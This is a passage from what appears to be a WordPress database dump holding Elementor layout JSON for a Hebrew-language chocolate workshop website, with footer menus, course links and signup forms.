\\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"8c21433\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"581b50ec\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"60e970ac\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"209f1b3e\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"3123b860\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"4f223074\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339bfd43\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"15e587e0\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(685,149,'_elementor_version','0.4'),(688,150,'notification_id','741'),(689,150,'type','info'),(690,150,'dismissable','1'),(691,150,'location','[\"everywhere\"]'),(692,150,'version',''),(693,150,'viewed','1'),(694,150,'expiration','1527289200'),(695,150,'plans','[]'),(696,151,'_wp_page_template','elementor_canvas'),(697,151,'_elementor_edit_mode','builder'),(698,151,'_elementor_template_type','post'),(699,151,'_elementor_data','[{\"id\":\"3d7689b8\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"570504a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"4fadbe7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"376ec0e9\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"2a6711cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"66f452c6\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"label_typography_typography\":\"custom\",\"label_typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"},\"typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 